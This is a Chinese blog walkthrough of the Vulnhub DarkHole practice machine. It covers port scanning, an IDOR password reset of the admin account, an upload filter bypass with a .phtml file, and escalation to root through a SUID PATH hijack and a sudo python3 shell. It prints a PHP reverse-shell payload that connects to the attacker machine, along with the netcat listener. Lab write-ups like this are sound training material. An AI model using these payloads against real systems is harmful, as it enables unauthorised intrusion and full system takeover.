首页 > 其他分享 >【渗透测试】Vulnhub DarkHole

【渗透测试】Vulnhub DarkHole

时间:2024-08-19 11:37:38浏览次数:14  
标签:文件 渗透 用户 192.168 DarkHole Vulnhub john 上传 id

渗透环境

攻击机:   IP: 192.168.216.129(Kali)
靶机:     IP:192.168.216.130
靶机下载地址:https://www.vulnhub.com/entry/darkhole-1,724/

进行渗透

一、 获取端口信息

nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。

nmap -O -sV -p- -A 192.168.216.130

img

开放了22和80端口。

二、 寻找WEB漏洞

访问80端口,出现登录框,并且可以注册账户

img

注册test账户并登录,登陆后跳转到更改用户信息和密码的页面

img

猜测这里存在越权修改其他用户密码的漏洞,尝试修改自己的密码并抓包

img

发现有两个id,我们新建的用户id为2,那么原有的用户id应该1,尝试将body里的id修改为1,返回修改成功

img

猜测原来的用户名为admin,密码刚才我们已经成功修改为admin了,尝试登录

img

登录成功,且该页面有上传功能。经过测试,这里上传文件只对后缀名进行了过滤,当我们上传php后缀的文件时会失败,但是上传phtml后缀的文件是可以的。这里可以上传一句话木马用蚁剑进行连接,也可以直接上传反向连接的php代码,我们使用后者。

1.phtml内容如下

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.216.129/4444 0>&1'");?>

让目标主机反向连接192.168.216.129(即攻击机)的4444端口

上传1.phtml,显示上传成功,并返回了上传文件的链接

img

点击红框中的File,跳转到以下URL

http://192.168.216.130/upload/1.phtml

接下来我们在kali上监听4444端口

nc -nlvp 4444

再次访问:http://192.168.216.130/upload/1.phtml

img

看到已经成功反弹了shell,当前用户是www-data

三、 提权

查看可以登录/bin/bash的用户

cat /etc/passwd | grep /bin/bash   

img

当然也可以通过查看/home目录查看创建的用户
常规思路,查看具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

img

发现可疑文件/home/john/toto,直接执行该文件

img

观察其输出,不难猜测,该文件调用了id命令,因此我们可以采用命令劫持的方式进行提权

echo 'chomd +s /bin/bash' > id            #在当前文件夹下写一个id文件
chmod 777 id                              #更改权限
export PATH=/var/www/html/upload:$PATH    #将当前路径加入环境变量
/home/john/toto                           #执行该文件,会调用我们重写的id

img

执行时发现我们的chmod +s命令发生了权限错误,即我们无法让自己写的id文件拥有SUID权限,那么只能先放弃在这里进行提权,先使用john的身份进行登录

echo '/bin/bash' > id
/home/john/toto
python3 -c 'import pty;pty.spawn("/bin/bash")'   #创建交互式shell

看到我们已经以john的身份登录进来了。
/home/john/下发现password文件

img

得到john用户的密码root123

查看John用户可执行的特权命令

sudo -l

img

看到John用户可以以root身份运行python3file.py
因此我们可以尝试修改file.py的内容

echo "import pty;pty.spawn('/bin/bash')" > file.py

当执行这个py文件时,会打开一个可交互的shell

接下来执行这个文件

sudo python3 /home/john/file.py

img

在这里有一个坑,当我们使用相对路径时会无法执行,使用绝对路径时才可以,我也不知道为啥

此时我们就已经拿到root权限了,flag在/root下,渗透结束

img

标签:文件,渗透,用户,192.168,DarkHole,Vulnhub,john,上传,id
From: https://www.cnblogs.com/MrSoap/p/18367015

相关文章

  • 一些免费好用的靶机渗透测试环境
    1、Vulhub:(各种漏洞环境集合,一键搭建漏洞测试靶场)https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2、Vulnhub:(国外实战靶场,适合入门提高)https://www.vulnhub.com/3、Vulnstack(红队实战靶场,域、横向渗透、多层网络,强烈推荐,目前共7个靶场,网上writeup......
  • vulnhub - Jarbas
    vulnhub-Jarbas信息收集sudonmap-sT-sV-sC-O-p22,80,3306,8080192.168.157.176sudonmap-script=vuln-p22,80,3306,8080192.168.157.176有robots.txt#wedon'twantrobotstoclick"build"links8080是后台登录目录扫描扫一下目录(不指定-xphp,html......
  • 【待做】【MySQL安全】内网渗透测试:MySql的利用与提权思路总结
    一、MySQL相关信息收集二、通过MySql获取服务器权限2.1获取MySql连接密码2.2MySQL口令爆破2.3MySQL哈希值爆破2.4从网站泄露的源代码中寻找数据库密码2.5通过MySql向服务器写WebShell2.6利用Unionselect写入WebShell2.7利用分......
  • Vulnhub JIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修......
  • 关于渗透测试靶场搭建的问题(小白经验)
    前言可能会有点啰嗦可以跳过我唠叨的环节,在我学习网络安全的过程中我遇到的问题总是多到离谱可以说比一般人多所以我比较的有点自信做这篇文章总结,当然文章末尾有整合资源懒人就直接拿吧,如果有不对的地方请毫不保留的指出谢谢——————————————————————......
  • DC-6 打靶渗透
    一、信息收集1、查看靶机的MAC地址:2、查看靶机的ip地址:nmap192.168.7.0/243、查看靶机开放的端口:nmap-p--sC-sT-sV-A192.168.7.2364、访问靶机的80端口,发现无法访问但是跳到了一个域名,应该是需要进行修改hosts文件,添加ip到域名的解析:5、添加好之后进行......
  • WEB渗透-近源攻击合集
    钓鱼网络Hostapd>aptinstallhostapddnsmasq>cd/etc/hostapd创建无加密热点>vimopen.conf修改以下内容Interface=wlan1Ssid=FreeWIFIDriver=nl80211Channel=1Hw_mode=g修改dns配置>vim/etc/dnsmasq.confDhcp-range=10.0.0.1,10.0.0.255,12hInterface......
  • 【Web API 】渗透测试指南
    一、概述1.1API的基本概念1.2API的作用1.3API的类型二、WebAPI渗透测试2.1测试工具2.2信息收集2.2.1目录扫描2.2.2网络流量分析2.2.3使用互联网资源2.3漏洞检测2.4实战案例2.4.1接口枚举2.4.......
  • VulnhubJIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择第二个,进入等待加载完成选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修改默认网卡......
  • CVE-2019-12422~shiro反序列化【春秋云境靶场渗透】
    #今天我们来攻克CVE-2019-12422春秋云境这个靶场漏洞当我们知道了该靶场是shiro反序列化漏洞,所以直接用工具梭哈好小子,离成功又近一步!!!......